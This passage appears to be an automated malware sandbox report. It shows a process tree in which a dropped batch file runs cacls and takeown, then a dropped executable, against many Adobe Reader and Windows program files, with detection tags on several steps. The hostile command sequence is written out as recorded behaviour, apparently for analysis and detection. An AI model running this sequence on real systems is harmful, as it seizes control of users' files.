C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
- Loads dropped DLL
PID:1908 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:1772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
- Loads dropped DLL
PID:932 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MyriadCAD.otf" -nobanner4⤵
- Executes dropped EXE
PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
PID:848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
PID:296 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
- Loads dropped DLL
PID:1512 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "forms_distributed.gif" -nobanner3⤵
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "forms_distributed.gif" -nobanner4⤵
- Executes dropped EXE
PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵
- Loads dropped DLL
PID:232 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "reviewers.gif" -nobanner3⤵
- Loads dropped DLL
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "reviewers.gif" -nobanner4⤵
- Executes dropped EXE
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "rss.gif" -nobanner3⤵
- Loads dropped DLL
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "rss.gif" -nobanner4⤵
- Executes dropped EXE
PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵
- Loads dropped DLL
PID:1860 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "trash.gif" -nobanner3⤵
- Loads dropped DLL
PID:524 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "trash.gif" -nobanner4⤵
- Executes dropped EXE
PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Identity-V" -nobanner3⤵
- Loads dropped DLL
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:208 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:680 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵
- Loads dropped DLL
PID:932 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "zy______.pfm" -nobanner3⤵
- Loads dropped DLL
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "zy______.pfm" -nobanner4⤵
- Executes dropped EXE
PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵
- Loads dropped DLL
PID:468 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵
- Loads dropped DLL
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵
- Executes dropped EXE
PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "can.hyp" -nobanner3⤵
- Loads dropped DLL
PID:204 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "can.hyp" -nobanner4⤵
- Executes dropped EXE
PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵
- Loads dropped DLL
PID:1936 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "usa03.hsp" -nobanner3⤵
- Loads dropped DLL
PID:680 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "usa03.hsp" -nobanner4⤵
- Executes dropped EXE
PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
- Loads dropped DLL
PID:228 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵
- Loads dropped DLL
PID:1096 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "TURKISH.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "TURKISH.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵
- Loads dropped DLL
PID:1892 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:1416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1258.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1258.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1788
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵
- Loads dropped DLL
PID:1580 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:916 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵
- Loads dropped DLL
PID:296 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "blank.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "blank.jtp" -nobanner4⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵
- Loads dropped DLL
PID:1816 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Seyes.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Seyes.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
- Loads dropped DLL
PID:1908 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵
- Loads dropped DLL
PID:524 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "eula.ini" -nobanner3⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "eula.ini" -nobanner4⤵
- Executes dropped EXE
PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "create_form.gif" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "create_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:916
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "forms_super.gif" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "forms_super.gif" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "server_lg.gif" -nobanner3⤵PID:468
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1096
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:1696
-
